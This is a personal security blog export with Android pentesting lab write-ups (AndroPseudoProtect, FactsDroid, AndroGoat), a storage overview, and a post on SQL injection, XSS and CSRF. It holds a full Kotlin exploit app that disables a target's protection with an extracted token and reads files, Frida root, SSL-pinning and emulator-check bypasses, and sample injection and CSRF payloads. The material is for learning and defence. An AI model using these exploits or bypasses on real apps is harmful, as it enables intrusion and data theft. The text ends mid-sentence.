[{"content":"","date":"15 April 2026","permalink":"/njeri/","section":"","summary":"","title":""},{"content":"","date":"15 April 2026","permalink":"/njeri/tags/android-security/","section":"Tags","summary":"","title":"Android Security"},{"content":"","date":"15 April 2026","permalink":"/njeri/tags/infosec/","section":"Tags","summary":"","title":"Infosec"},{"content":"","date":"15 April 2026","permalink":"/njeri/tags/insecure-storage/","section":"Tags","summary":"","title":"Insecure Storage"},{"content":"Insecure Storage in Android # Insecure storage is still one of the easiest ways to recover sensitive data from an Android app during a pentest. Even when an app has strong network protections, it may still expose tokens, cached responses, credentials, or personal data locally. This post is a quick guide to the main Android storage locations and what they mean from a security testing perspective.\nShared Preferences # A key-value XML file that stores user preferences such as dark mode or light mode. They are also often used to store access tokens or other kinds of secrets. In itself, that is not an issue, but it makes shared preferences a very interesting target for stealing or overwriting internal files.\nDatabases # Many apps use SQLite3 to store more complex data structures in internal storage.\nCreated by the method openOrCreateDatabase(). In practice, this is where a pentester might find cached API responses, tokens, user profile data, or even plaintext credentials if the app stores them carelessly.\nCache Files # Used to store temporary files, and it gets cleaned automatically by the system when storage runs low. It can be accessed using getCacheDir(), which resolves to the application\u0026rsquo;s internal folder. From a pentesting perspective, cache files are worth checking because developers sometimes leave sensitive data there temporarily, such as downloaded documents, images, tokens, or session artifacts, assuming the system will remove them later.\nInternal Storage # The private directory of an app located in the /data/data/\u0026lt;apk-path\u0026gt; exclusive to the application and not shared with other devices /data/data is accessible only on rooted devices.\nExternal Storage # This used to be the SD card but now lives in internal flash storage. Permissions are much more limited nowadays, and it contains shared data such as photos and downloads. It is mounted on the /sdcard or /storage/emulated/0 partition. In the past, external storage was considered insecure because every app could access all the data on it. It was also easy to physically remove the SD card and steal its contents, but now we have scoped storage from Android 10 onward. Scoped storage now restricts applications to their own app-specific directory on external storage, for example /sdcard/Android/data/owasp.sat.agoat/, which other apps cannot access even if they have the READ_EXTERNAL_STORAGE permission.\nScoped storage bypass: Apps can still use the MANAGE_EXTERNAL_STORAGE permission on Android 13+ to request access to all files on external storage. Google Play has extremely strict policies on this. Unless your app is a file manager, antivirus, or backup tool, Google will likely reject it.\nAndroid Keystore # Stores cryptographic keys and uses hardware-backed security. It does not store passwords, only the keys.\nFiles Directory # This is created when an application stores files in internal storage by using the openFileOutput() method, and you can read those files using getFilesDir().\nSummary # Android applications utilize several distinct methods for storing data, each offering varying levels of privacy and security. Internal storage options like Shared Preferences and SQLite databases house private app details, while the Files and Cache directories manage temporary or structured content. While external storage was historically vulnerable to unauthorized access, modern versions of the operating system now implement scoped storage to isolate application data.\nFor highly sensitive information, the Android Keystore provides a specialized environment that secures cryptographic keys through hardware-based protection. Ultimately, understanding these diverse storage locations is essential for protecting user secrets and maintaining system integrity on mobile devices.\n","date":"15 April 2026","permalink":"/njeri/posts/android_storage/","section":"Posts","summary":"Insecure Storage in Android # Insecure storage is still one of the easiest ways to recover sensitive data from an Android app during a pentest. Even when an app has strong network protections, it may still expose tokens, cached responses, credentials, or personal data locally. This post is a quick guide to the main Android storage locations and what they mean from a security testing perspective.\nShared Preferences # A key-value XML file that stores user preferences such as dark mode or light mode. They are also often used to store access tokens or other kinds of secrets. In itself, that is not an issue, but it makes shared preferences a very interesting target for stealing or overwriting internal files.","title":"Insecure Storage in Android"},{"content":"","date":"15 April 2026","permalink":"/njeri/tags/mobile-pentesting/","section":"Tags","summary":"","title":"Mobile Pentesting"},{"content":"","date":"15 April 2026","permalink":"/njeri/posts/","section":"Posts","summary":"","title":"Posts"},{"content":"","date":"15 April 2026","permalink":"/njeri/tags/","section":"Tags","summary":"","title":"Tags"},{"content":"8ksec - AndroPseudoProtect: Ultimate Device Security # Exploiting Exported Components and Bypassing Security By Obscurity Mechanisms # The goal of this exercise was to develop an android application that exploits Android\u0026rsquo;s IPC by disabling AndroPseudoProtect.apk\u0026rsquo;s security functionality.\nMy initial thought process was that this would likely involve exploiting improperly exposed components. Specifically, if sensitive components are configured with exported=true, an attacker application could potentially access internal functionality via Inter-Process Communication (IPC), manipulate behavior, and bypass security controls. This assumption proved to be correct.\nInstalling and Running the App # Upon launching the app, the application asks for access to all files.\nStatic Analysis with Jadx Findings # 1. Sensitive app components set to exported=true # After decompiling the APK with Jadx and looking at the AndroidManifest.xml file, I noted that both the SecurityService and SecurityReceiver were set to exported=true.\nThis is a critical misconfiguration. When an Android component is configured as exported=true, it becomes accessible to other applications on the device. In the AndroPseudoProtect application, the functionality to secure the files is controlled via explicit intents sent to the SecurityService. Therefore, this makes it possible for an attacker to start and stop the security services by creating a malicious application that targets these components directly.\n2. Security Through Obscurity # After manual analysis of the SecurityService file, I noted that there is a call to SecurityUtils().getSecurityToken(). This method retrieves a security token from a native library. The token is then validated whenever startSecurity() or stopSecurity() is invoked. The design assumption appears to be that storing the token in native code prevents attackers from accessing it.\nThe token is used by the app to validate whether a caller is authorized to start or stop the security service. An attacker can reverse engineer the native library code to obtain the token, which would enable them to call functions to start and stop the SecurityService from their malicious application.\nExtracting the token: To validate this assumption, I proceeded with the following steps:\nDecompiled the APK using apktool. Navigated to the lib/ directory. Located the native .so file. I then reverse engineered the library using Ghidra. I identified the getSecurityToken() function in Ghidra. Extracted the hardcoded token: 8ksec_S3cr3tT0k3n_D0N0tSh4r3. I also observed that the native library generates a log message each time the user clicks the Start Service or Stop Service buttons. These buttons internally invoke the startSecurity() and stopSecurity() functions. From the code analysis, it is clear that both functions require the security token to be passed as part of the request. The logs captured from the Android emulator confirm that the token is validated whenever these methods are executed. This behavior further verifies that the application relies on the hardcoded native token to authorize starting and stopping the security service.\n3. Listening to broadcasts to know when to disable security # Further analysis revealed that the application sends broadcasts whenever the security service is started or stopped. Specifically:\nA broadcast is sent when the security service is started. A broadcast is sent when the security service is stopped. This means that any third-party application installed on the device can register a BroadcastReceiver and listen for the ACTION_SECURITY_STARTED event whenever the user enables security through the AndroPseudoProtect app.\nThe malicious app can then use the token we obtained above to call stopSecurity. From the user’s perspective, security appears to be enabled; however, in reality, it has already been disabled in the background by the malicious application. This demonstrates how unprotected broadcast mechanisms can be abused to monitor application state changes and trigger automated exploitation logic without requiring any direct user interaction.\nData Exfiltration from External Storage # For AndroPseudoProtect to work properly, it is granted READ_EXTERNAL_STORAGE, MANAGE_EXTERNAL_STORAGE, and WRITE_EXTERNAL_STORAGE permissions so that the app can encrypt files located in the external storage.\nAfter the malicious app disables the encryption enforced by the AndroPseudoProtect app, the attacker can use adb to grant the malicious app permission to read from external storage: adb shell pm grant com.example.myapplication android.permission.READ_EXTERNAL_STORAGE and exfiltrate all the files and data stored there.\nExploit Development # To demonstrate the exploit, I developed a secondary Android application that:\nListens for ACTION_SECURITY_STARTED. Crafts an explicit intent targeting SecurityService and SecurityReceiver. Includes the security token recovered from the .so file. Invokes startService() to stop the protection mechanism. Reads the unencrypted files from External storage and displays them in the malicious app. Because the target components were exported and lacked caller validation, the exploit application could interact with them as if it were the legitimate app itself. The result is a complete bypass of the application\u0026rsquo;s encryption protection using only Android’s IPC framework.\nMalicious App Implementation (MainActivity.kt) # package com.example.myapplication import android.content.BroadcastReceiver import android.content.ComponentName import android.content.Context import android.content.Intent import android.os.Bundle import android.os.Environment import android.util.Log import android.widget.Toast import androidx.activity.ComponentActivity import androidx.activity.compose.setContent import androidx.activity.enableEdgeToEdge import androidx.compose.foundation.layout.Column import androidx.compose.foundation.layout.fillMaxSize import androidx.compose.foundation.layout.fillMaxWidth import androidx.compose.foundation.layout.height import androidx.compose.foundation.layout.padding import androidx.compose.foundation.lazy.LazyColumn import androidx.compose.foundation.lazy.items import androidx.compose.material3.Button import androidx.compose.material3.Scaffold import androidx.compose.material3.Text import androidx.compose.runtime.Composable import androidx.compose.runtime.mutableStateListOf import androidx.compose.ui.Modifier import androidx.compose.ui.layout.ContentScale import androidx.compose.ui.tooling.preview.Preview import androidx.compose.ui.unit.dp import coil.compose.AsyncImage import com.example.myapplication.ui.theme.MyApplicationTheme import java.io.File class MainActivity : ComponentActivity() { companion object { const val TARGET_PACKAGE = \u0026#34;com.eightksec.andropseudoprotect\u0026#34; const val RECEIVER_CLASS = \u0026#34;com.eightksec.andropseudoprotect.SecurityReceiver\u0026#34; const val SERVICE_CLASS = \u0026#34;com.eightksec.andropseudoprotect.SecurityService\u0026#34; const val ACTION_SECURITY_STARTED = \u0026#34;com.eightksec.andropseudoprotect.ACTION_SECURITY_STARTED\u0026#34; const val ACTION_STOP_SECURITY = \u0026#34;com.eightksec.andropseudoprotect.STOP_SECURITY\u0026#34; const val EXTRA_TOKEN = \u0026#34;security_token\u0026#34; const val SECRET_TOKEN = \u0026#34;8ksec_S3cr3tT0k3n_D0N0tSh4r3\u0026#34; } private val fileList = mutableStateListOf\u0026lt;String\u0026gt;() private val securityStartedReceiver = object : BroadcastReceiver() { override fun onReceive(context: Context?, intent: Intent?) { if (intent?.action == ACTION_SECURITY_STARTED) { sendStopSecurityBroadcast() } } } private fun createSecurityIntent(className: String) = Intent(ACTION_STOP_SECURITY).apply { component = ComponentName(TARGET_PACKAGE, className) putExtra(EXTRA_TOKEN, SECRET_TOKEN) } private fun sendStopSecurityBroadcast() { sendBroadcast(createSecurityIntent(RECEIVER_CLASS)) } override fun onCreate(savedInstanceState: Bundle?) { super.onCreate(savedInstanceState) enableEdgeToEdge() setContent { MyApplicationTheme { Scaffold(modifier = Modifier.fillMaxSize()) { innerPadding -\u0026gt; Greeting( name = \u0026#34;Android\u0026#34;, files = fileList, modifier = Modifier.padding(innerPadding), onStopSecurityClick = { stopSecurity() }, onReadFilesClick = { readDownloadDirectory() } ) } } } } private fun readDownloadDirectory() { fileList.clear() val downloadFolder = Environment.getExternalStoragePublicDirectory(Environment.DIRECTORY_DOWNLOADS) val files = downloadFolder.listFiles() if (files != null \u0026amp;\u0026amp; files.isNotEmpty()) { files.forEach { file -\u0026gt; fileList.add(file.absolutePath) } } else { Toast.makeText(this, \u0026#34;Download folder is empty or inaccessible\u0026#34;, Toast.LENGTH_SHORT).show() } } private fun stopSecurity() { try { startService(createSecurityIntent(SERVICE_CLASS)) sendStopSecurityBroadcast() Toast.makeText(this, \u0026#34;Stopping Security Service\u0026#34;, Toast.LENGTH_SHORT).show() } catch (e: Exception) { Toast.makeText(this, \u0026#34;Error: ${e.message}\u0026#34;, Toast.LENGTH_LONG).show() } } override fun onDestroy() { super.onDestroy() try { unregisterReceiver(securityStartedReceiver) } catch (e: Exception) { Log.i(\u0026#34;missing_register\u0026#34;, \u0026#34;Receiver not registered\u0026#34;) } } } @Composable fun Greeting( name: String, files: List\u0026lt;String\u0026gt;, modifier: Modifier = Modifier, onStopSecurityClick: () -\u0026gt; Unit = {}, onReadFilesClick: () -\u0026gt; Unit = {} ) { Column(modifier = modifier.padding(16.dp)) { Text(text = \u0026#34;Hello $name!\u0026#34;) Button(onClick = onStopSecurityClick, modifier = Modifier.padding(top = 8.dp)) { Text(\u0026#34;Stop Security\u0026#34;) } Button(onClick = onReadFilesClick, modifier = Modifier.padding(top = 8.dp)) { Text(\u0026#34;Read Files\u0026#34;) } Text(text = \u0026#34;Files in /Download:\u0026#34;, modifier = Modifier.padding(top = 16.dp)) LazyColumn(modifier = Modifier.fillMaxSize()) { items(files) { filePath -\u0026gt; Column(modifier = Modifier.padding(vertical = 8.dp)) { if (filePath.lowercase().endsWith(\u0026#34;.jpg\u0026#34;) || filePath.lowercase().endsWith(\u0026#34;.png\u0026#34;)) { AsyncImage( model = filePath, contentDescription = \u0026#34;Image\u0026#34;, modifier = Modifier.fillMaxWidth().height(200.dp), contentScale = ContentScale.Crop ) } Text(text = filePath.substringAfterLast(\u0026#34;/\u0026#34;), modifier = Modifier.padding(top = 4.dp)) } } } } } @Preview(showBackground = true) @Composable fun GreetingPreview() { MyApplicationTheme { Greeting(\u0026#34;Android\u0026#34;, emptyList()) } } Resources # Here is the proof of exploit video: https://youtu.be/0gmX6fSeqak\nAnd here is the link to the exploit apk\nConclusion # This exercise highlights several important mobile security principles:\n**We should not set sensitive components of our application to exported=true**: Any exported component expands your attack surface. If a component does not need to be accessed externally, it should not be exported. If it must be exported, it should be protected with strong custom permissions. Security by Obscurity doesn\u0026rsquo;t make your app secure: Moving sensitive values to a native library .so file does not prevent reverse engineering. Attackers can decompile, disassemble, and analyze native libraries to obtain the hidden app secrets easily using tools like Ghidra. ","date":"1 March 2026","permalink":"/njeri/posts/andropseudoprotect/","section":"Posts","summary":"8ksec - AndroPseudoProtect: Ultimate Device Security # Exploiting Exported Components and Bypassing Security By Obscurity Mechanisms # The goal of this exercise was to develop an android application that exploits Android\u0026rsquo;s IPC by disabling AndroPseudoProtect.apk\u0026rsquo;s security functionality.\nMy initial thought process was that this would likely involve exploiting improperly exposed components. Specifically, if sensitive components are configured with exported=true, an attacker application could potentially access internal functionality via Inter-Process Communication (IPC), manipulate behavior, and bypass security controls. This assumption proved to be correct.\nInstalling and Running the App # Upon launching the app, the application asks for access to all files.","title":"8ksec - AndroPseudoProtect: Ultimate Device Security"},{"content":"","date":"1 March 2026","permalink":"/njeri/tags/mobile-exploits/","section":"Tags","summary":"","title":"Mobile Exploits"},{"content":"","date":"1 March 2026","permalink":"/njeri/tags/mobile-security/","section":"Tags","summary":"","title":"Mobile Security"},{"content":"GOAL: Intercept network traffic in FactsDroid and view/modify the API requests and responses between FactsDroid and the backend server without statically patching the provided APK. The objective is to successfully implement a Man-in-The-Middle (MITM) attack that allows you to manipulate the facts being displayed to the user, potentially inserting custom content or modifying the retrieved facts before they reach the application.\nUpon installing the app using adb install factsdroid.apk, I immediately see this error message when launching the app: In order to bypass the root check, I injected the Frida anti-root script into my APK:\nfrida -U --codeshare dzonerzy/fridantiroot -f com.eightksec.factsdroid\nI was able to successfully bypass the root check:\nI had earlier added Burp\u0026rsquo;s CA certificate into my emulator and set up Burp to intercept all the network calls coming from my app by following this tutorial.\nSSL # SSL/TLS is at the application layer of the network and it ensures that the traffic transmitted between the client and the server is properly encrypted. When an API request is made, the app performs an SSL/TLS handshake between the client and the server to establish a secure channel.\nSSL Pinning, on the other hand, is an extra layer of security implemented directly in the app\u0026rsquo;s code to stop Man-in-the-Middle (MITM) attacks. Usually, an app trusts any certificate signed by a valid root Certificate Authority (CA) found in the device\u0026rsquo;s trust store. However, with SSL pinning, instead of relying on the trust store, the app is hardcoded with a specific pin which is typically the server’s public key or its specific certificate.\nDuring the TLS handshake, the app compares the server\u0026rsquo;s certificate against this hardcoded pin. If they don\u0026rsquo;t match exactly, the app kills the connection immediately, even if the certificate is technically valid or signed by a trusted authority. This prevents a pentester from using a self-signed certificate from a tool like Burp Suite to intercept and read the traffic, which is why we see the error below upon clicking the Random Fact button.\nTherefore, I used Frida to bypass the SSL CA authenticity check using the following command (since this is a Flutter app):\nfrida -U --codeshare dzonerzy/fridantiroot --codeshare TheDauntless/disable-flutter-tls-v1 -f com.eightksec.factsdroid\nAfter bypassing SSL pinning, I can now see the facts being rendered on the UI:\nEnsure that Verify Invisible Proxying is enabled from the proxy settings -\u0026gt; Request Handling. After enabling this, I was able to intercept and modify the response to change the fact rendered on the UI.\n","date":"4 February 2026","permalink":"/njeri/posts/factsdroid/","section":"Posts","summary":"GOAL: Intercept network traffic in FactsDroid and view/modify the API requests and responses between FactsDroid and the backend server without statically patching the provided APK. The objective is to successfully implement a Man-in-The-Middle (MITM) attack that allows you to manipulate the facts being displayed to the user, potentially inserting custom content or modifying the retrieved facts before they reach the application.\nUpon installing the app using adb install factsdroid.apk, I immediately see this error message when launching the app: In order to bypass the root check, I injected the Frida anti-root script into my APK:\nfrida -U --codeshare dzonerzy/fridantiroot -f com.","title":"8kSec - Factsdroid WriteUp"},{"content":"","date":"4 February 2026","permalink":"/njeri/tags/mitm-mobile-exploits/","section":"Tags","summary":"","title":"MITM - Mobile Exploits"},{"content":"","date":"4 February 2026","permalink":"/njeri/tags/pentesting/","section":"Tags","summary":"","title":"Pentesting"},{"content":"","date":"4 February 2026","permalink":"/njeri/tags/reverse-engineering/","section":"Tags","summary":"","title":"Reverse Engineering"},{"content":"3 Critical Database Command Injection Security Threats # For software engineers, it may be easy to assume that no hacker would target our app since it isn’t big or well known. This attitude can lead to recklessness and lower measures for securing data on an app. However, it’s important to remember that security begins at the design phase. Database security is about protecting the \u0026ldquo;CIA Triad\u0026rdquo;: Confidentiality, Integrity, and Availability.\nIn this blog post, you’ll learn about the core database threats that jeopardize the CIA triad principles. By the end of the post, you’ll have learned about the following topics:\nSQL Injection (SQLi) Cross-Site Scripting (XSS) Cross-Site Request Forgery (CSRF) 1. SQL Injection (SQLi) # Happens when the SQL database executes user data as code. This exploit happens when untrusted user input is used in an SQL query without sanitization. This alters database queries, leading to consequences such as data loss and data exfiltration by malicious attackers.\nTypes of SQL Injection\nBasic Boolean Logic: Using conditions that are always true, like ' OR '1'='1, or commenting parts of the SQL query (like the password check) using comments -- to bypass authentication.\nUnion-based: Combines results from different tables using the UNION operator to steal data from another table.\nBlind SQL: Used when the application doesn\u0026rsquo;t return direct error messages; attackers instead rely on server response patterns or timing.\nBoolean attacks which rely on binary answers from the database by observing the response body or headers. Time-based attacks that rely on time delays i.e. how long the database took to respond, e.g. if user = \u0026ldquo;Admin\u0026rdquo; WAIT 5 seconds. Error-based: Causing the database to produce error messages that reveal the database type or table names. Countermeasures # Prepared Statements\nThe most effective way to prevent SQL injection is the use of prepared statements, also known as parameterized queries.\nWhy it is secure: The database treats the bind variables strictly as data, not code. Even if an attacker inputs SQL commands like ' OR '1'='1, the database reads it merely as a literal string searching for a user named ' OR '1'='1.\nInput Sanitization\nValidating input ensures the data meets expected formats before it is processed and can be done using:\nAllow listing – only accepting a well-defined set of safe values. Block listing – filtering out specific characters known to be dangerous, such as apostrophes ', semicolons ;, or hyphens --. 2. Cross-Site Scripting (XSS) # XSS targets the user\u0026rsquo;s browser. It happens when an application takes untrusted input and sends it back to the browser without proper encoding, so that the input is treated as HTML/JavaScript and executed in the context of the victim’s session.\nHow the compromise happens\nAn attacker injects a malicious script (the XSS payload) into a page the victim will load. When the victim’s browser renders that page, the script runs with the victim’s cookies, tokens and permissions.\nXSS Types\nReflected XSS: The attacker tricks a user into clicking a malicious link that contains the script payload in a query parameter or form field. The server takes that value and “reflects” it back in the response without sanitizing it, so the script executes as soon as the victim loads the response.\nStored / Persistent XSS: The malicious script is saved on the server side (for example, as a blog comment, profile field or chat message). Every user who later views that page automatically runs the script in their browser—no special link is required for those subsequent victims.\n3. Cross-Site Request Forgery (CSRF) # CSRF happens when an attacker forces an authenticated user to send unwanted requests to a web application where they are currently logged in. This is dangerous because browsers automatically attach your cookies and session IDs to every request, so the app thinks the forged request is coming from you.\nA CSRF attack happens this way:\nThe Session: You are logged into a site (like your bank portal) in Tab A. The website has stored a cookie and session ID in your browser so you can perform multiple actions—like checking a balance and then downloading a statement—without re‑authenticating for every click. The Trap: In Tab B, you visit a malicious site or click a maliciously crafted link. This page contains a hidden request such as a form that submits automatically or a link to https://bank.com/transfer?amount=10000\u0026amp;to=attacker. The Hijack: Because your browser sees a request going to your bank, it automatically sends your valid session cookie. The bank\u0026rsquo;s server sees your valid cookie, assumes the request originated from you, and processes the transfer. Countermeasures # Protecting against CSRF requires more than just relying on the browser\u0026rsquo;s default behavior:\nAnti-CSRF Tokens: The server generates a unique, unpredictable nonce (a random string) that must be included in every state‑changing request, like a POST request to initiate a transfer of funds. Because of the Same‑Origin Policy (SOP), an attacker on a different website cannot read this token, making it very hard to forge a valid request. HTTP Referer / Origin Validation: The server checks the Referer or Origin header to ensure the request really started from your app (e.g. https://bank.com) and not from a third‑party malicious site. Double Submit Cookies: The server sends both a session cookie and a separate anti‑CSRF cookie. The client must submit the anti‑CSRF value (e.g. in a hidden form field) along with the request. The server verifies that the submitted value matches the cookie value before processing the action. Key Terms (for beginners) # CIA Triad – Security model that focuses on protecting data Confidentiality (no unauthorized reading), Integrity (no unauthorized changes), and Availability (systems stay up and usable). Database – A structured place where your application stores data (for example, users, orders, or transactions). SQL (Structured Query Language) – The language used to talk to relational databases (e.g. SELECT, INSERT, UPDATE). Query – A request you send to the database, such as “give me all users with this email”. SQL Injection – A vulnerability where untrusted user input is treated as part of the SQL query, letting an attacker change what the query does. Prepared / Parameterized Statement – A safe way to build SQL queries where placeholders (like ? or :id) are used and user input is bound as data instead of being concatenated into the query string. Input Sanitization / Validation – Checking and cleaning user input to make sure it matches an expected pattern (for example, an email, an integer, or a limited set of values). Cookie – A small piece of data stored in the browser and sent automatically with requests to a website, often used to keep you logged in. Session ID – A unique identifier stored in a cookie that tells the server which logged‑in user you are. XSS (Cross‑Site Scripting) – A vulnerability where untrusted input is rendered as HTML/JavaScript and executed in the victim’s browser. CSRF (Cross‑Site Request Forgery) – An attack where a malicious site tricks your browser into sending a request to a site where you are already logged in. Same‑Origin Policy (SOP) – Browser rule that only allows scripts to read responses from the same origin (same scheme, host, and port). This helps prevent one site from reading another site’s data. Nonce – A random value that is used once (number‑used‑once) to make requests unique and harder to forge. ","date":"3 February 2026","permalink":"/njeri/posts/database_security/","section":"Posts","summary":"3 Critical Database Command Injection Security Threats # For software engineers, it may be easy to assume that no hacker would target our app since it isn’t big or well known. This attitude can lead to recklessness and lower measures for securing data on an app. However, it’s important to remember that security begins at the design phase. Database security is about protecting the \u0026ldquo;CIA Triad\u0026rdquo;: Confidentiality, Integrity, and Availability.\nIn this blog post, you’ll learn about the core database threats that jeopardize the CIA triad principles. By the end of the post, you’ll have learned about the following topics:","title":"3 Critical Database Security Threats You Need to Know"},{"content":"","date":"3 February 2026","permalink":"/njeri/tags/android/","section":"Tags","summary":"","title":"android"},{"content":"","date":"3 February 2026","permalink":"/njeri/categories/android/","section":"Categories","summary":"","title":"android"},{"content":"Android Pentesting # To sharpen my skills, I recently took a deep dive into AndroGoat—a deliberately insecure Android application designed to showcase the most common OWASP Mobile Top 10 vulnerabilities.\nIn this post, I’ll walk through how I combined both static and dynamic analysis to uncover hardcoded secrets, bypass security checks with Frida, and extract sensitive data from local storage.\nMy pentesting toolkit:\nMy pentesting tookit included:\nJadx-GUI: For decompiling and reading Java/Kotlin source code.\nThe Android Debug Bridge (adb)**: The \u0026ldquo;command line\u0026rdquo; for interacting with the emulator on android studio.\nFrida: For dynamic instrumentation. Instrumentation is the art of imjecting new functionality to the application at runtime e.g adding logs, bypassing certain conditional checks e.g check if the device running the app is an emulator etc.\nMobSF \u0026amp; APKLeaks: For automated static analysis of the apk.\nBurp Suite: To intercept network traffic.\nReconnaissance with MobSF # I started my recon by first uploading the androgoat apk to MobSF. This gave me a high-level overview of the attack surface before I started manual testing. Through MobSF,I was able to verify several high-risk strings:\nHardcodes Secrets including AWS Credentials and OpenAI Key: Found in the resource strings and app logic.\nSensitive Information is getting logged\nSQL Injection\nDebug Mode: The android:debuggable flag is set to true.\nWeak Cryptographic Algorithm MD5 weak algorithm is used to hash pins and passwords.\n1. Hardcoded Secrets (High) # I found multiple static credentials in the APK. Because APKs are just ZIPs, anyone can unzip or decompile and steal these keys; obfuscation does not protect them. The exposed OpenAI and AWS keys could be abused for data access and cloud spend.\nHow I uncovered them\nManual static review in Jadx: Searched for strings like \u0026ldquo;key\u0026rdquo; and \u0026ldquo;secret\u0026rdquo; and saw the OpenAI key that automated tools missed. Automation with apkleaks: Flagged the same OpenAI key and the AWS secret: abcdef1234567890abcdef1234567890abcdef12 (OpenAI API key) OviCwsFNWeoCSDKl3ZoD8j4BPnc1kCsfV+lOABCw (AWS Secret Access Key) Cross-check in MobSF: Its Secrets report listed the same tokens in resources/config, confirming they are truly embedded: The following secrets were identified from the app. Ensure that these are not secrets or private information. -abcdef1234567890abcdef1234567890abcdef12 258EAFA5-E914-47DA-95CA-C5AB0DC85B11 sha256/5gsjyidrmWjcLRClfCk+Dd6O0nx1CyFrVUW5wVkwEx0= OviCwsFNWeoCSDKl3ZoD8j4BPnc1kCsfV+lOABCw sha256/mEflZT5enoR1FuXLgYYGqnVEoZvmf9c2bVBpiOjYQ0c= How to Reproduce\nDecompile with Jadx; search for apiKey, secret, Bearer, AWS across code and resources. Run apkleaks -f androgoat.apk to enumerate obvious tokens. Upload the APK to MobSF and open the Secrets section to verify what’s embedded. Fix\nDo not ship secrets in the APK. Fetch them at runtime from a backend over TLS and gate with authentication/authorization. Rotate the exposed OpenAI and AWS keys immediately; assume compromise. Add automated secret scanning tools like gitleaks or trufflehog in CI before signing and shipping the APK to help detect is there are secrets in the codebase. 2. Root and Emulator Detection # Root detection # A rooted device has a modified system that allows the user and apps to execute commands as the root; su.\nWhy apps care: Banking and security apps block rooted devices because if a device is rooted, the fundamental security sandbox is compromised. Malware with root access could theoretically read the banking app\u0026rsquo;s memory or keys.\nRoot detection is done by checking if the device running the application can see the su binary, then you must be root E.G.\nString[] file = {\u0026#34;/system/app/Superuser/Superuser.apk\u0026#34;, \u0026#34;/system/app/Superuser.apk\u0026#34;, \u0026#34;/sbin/su\u0026#34;, \u0026#34;/system/bin/su\u0026#34;, \u0026#34;/system/xbin/su\u0026#34;, \u0026#34;/data/local/xbin/su\u0026#34;, \u0026#34;/data/local/bin/su\u0026#34;, \u0026#34;/system/sd/xbin/su\u0026#34;, \u0026#34;/system/bin/failsafe/su\u0026#34;, \u0026#34;/data/local/su\u0026#34;, \u0026#34;/su/bin/su\u0026#34;, \u0026#34;re.robv.android.xposed.installer-1.apk\u0026#34;, \u0026#34;/data/app/eu.chainfire.supersu-1/base.apk\u0026#34;}; boolean result = false; for (String files : file) { File f = new File(files); result = f.exists(); if (result) { break; } Despite the check being there, I am still able to bypass this filter check on a rooted android emulator (one that ships with Google APIs and not Google playstore).\nGoogle APIs emulator images allow adb‑root and writable partitions but do not include a su binary. Any root‑detection logic that relies solely on checking for su will incorrectly conclude that the device is not rooted, even though the environment is privileged thus the check will always return false.\nThis is why you need to also add an emulator check.\nEmulator Detection # The app grabs almost every identifying string from the Android OS and mashes them into one long string variable called buildDetails and then checks for any words associated with emulators e.g generic, sdk, genymotion, x86, emulator etc\nBypassing this with Frida:\nInject code that always returns False when the isEmulator function is called.\nJava.perform(function () { // 1. Target the specific Activity class var EmulatorDetection = Java.use(\u0026#34;owasp.sat.agoat.EmulatorDetectionActivity\u0026#34;); // 2. Overwrite the isEmulator function EmulatorDetection.isEmulator.implementation = function () { // 3. Force return false return false; }; }); I was able to successfully bypass this check:\nprivate final boolean isEmulator() { String buildDetails = (Build.FINGERPRINT + Build.DEVICE + Build.MODEL + Build.BRAND + Build.PRODUCT + Build.MANUFACTURER + Build.HARDWARE).toLowerCase(); Intrinsics.checkNotNullExpressionValue(buildDetails, \u0026#34;this as java.lang.String).toLowerCase()\u0026#34;); return StringsKt.contains$default((CharSequence) buildDetails, (CharSequence) \u0026#34;generic\u0026#34;, false, 2, (Object) null) || StringsKt.contains$default((CharSequence) buildDetails, (CharSequence) EnvironmentCompat.MEDIA_UNKNOWN, false, 2, (Object) null) || StringsKt.contains$default((CharSequence) buildDetails, (CharSequence) \u0026#34;emulator\u0026#34;, false, 2, (Object) null) || StringsKt.contains$default((CharSequence) buildDetails, (CharSequence) \u0026#34;sdk\u0026#34;, false, 2, (Object) null) || StringsKt.contains$default((CharSequence) buildDetails, (CharSequence) \u0026#34;vbox\u0026#34;, false, 2, (Object) null) || StringsKt.contains$default((CharSequence) buildDetails, (CharSequence) \u0026#34;genymotion\u0026#34;, false, 2, (Object) null) || StringsKt.contains$default((CharSequence) buildDetails, (CharSequence) \u0026#34;x86\u0026#34;, false, 2, (Object) null) || StringsKt.contains$default((CharSequence) buildDetails, (CharSequence) \u0026#34;goldfish\u0026#34;, false, 2, (Object) null) || StringsKt.contains$default((CharSequence) buildDetails, (CharSequence) \u0026#34;test-keys\u0026#34;, false, 2, (Object) null); } Recommendations # 1. Robust Device Integrity\nDefense in Depth: Treat root and emulator checks as hardening only, not as a primary security control. Back‑end authorization and server‑side controls must not trust these checks.\nEnhanced Root Detection: If you still want stronger detection, use multiple root indicators instead of a single su path list. This includes:\nMount options and build tags.\nKnown root apps and writable system paths.\nSELinux state and dangerous system properties.\nMulti-Factor Emulator Detection: Complement string‑based emulator checks with:\nSensor anomalies: Identifying a lack of GPS or accelerometer patterns.\nTelephony inconsistencies: Checking for IMEI/SIM anomalies.\nEnvironment checks: Searching for emulator‑specific files and properties.\nAttestation Services: Consider using Google Play Integrity API (or SafetyNet Attestation) to get a server‑validated signal of device integrity.\n2. Runtime Protection\nAnti-Instrumentation: Increase resistance against dynamic instrumentation: Obfuscation: Obfuscate critical classes and methods, including your isEmulator and root check logic. Anti-Hooking: Add basic anti‑debugging and anti‑hooking checks (e.g., Frida detection, debugger presence, and tamper checks on Build.* values). 3. android:debuggable # In a real app, android:debuggable should be false in the release manifest and controlled via Gradle build types, so only debug builds are debuggable and the Play Store APK ships with debugging disabled.\nSetting it to true lowers the attackers difficulty in learning how the app works or pausing the app and modifying the code while the app is running a dn recompiling it with additional vulnerability.\nGOAL: Prevents dynamic analysis tools from hooking and manipulating the app.\n4. Insecure Data Storage # In AndroGoat, the same sensitive information (usernames and passwords) is written to multiple storage locations on the device: Shared Preferences, SQLite databases, temporary files and even external storage. None of these locations are encrypted. This means that anyone who can get filesystem access (stolen device, rooted device, adb/run-as, or a malicious app with storage permissions) can trivially dump and read these values without needing to break any cryptographic algorithms.\nShared Preferences # The app stores the username and password in user.xml under /data/data/owasp.sat.agoat/shared_prefs. This file is just an XML key/value store. On a normal (non‑rooted) device it is only readable by the app’s UID, but:\nOn a rooted device or emulator, I can simply cat this file or pull it off the device. With run-as owasp.sat.agoat (and android:debuggable=true), I can also access it from adb without full root. So even though Shared Preferences feels like a “private” store, it is not secure enough for raw credentials.\nSQLite # Android apps use SQLite for structured data storage (similar to a standard SQL database).\nThe Vulnerability: 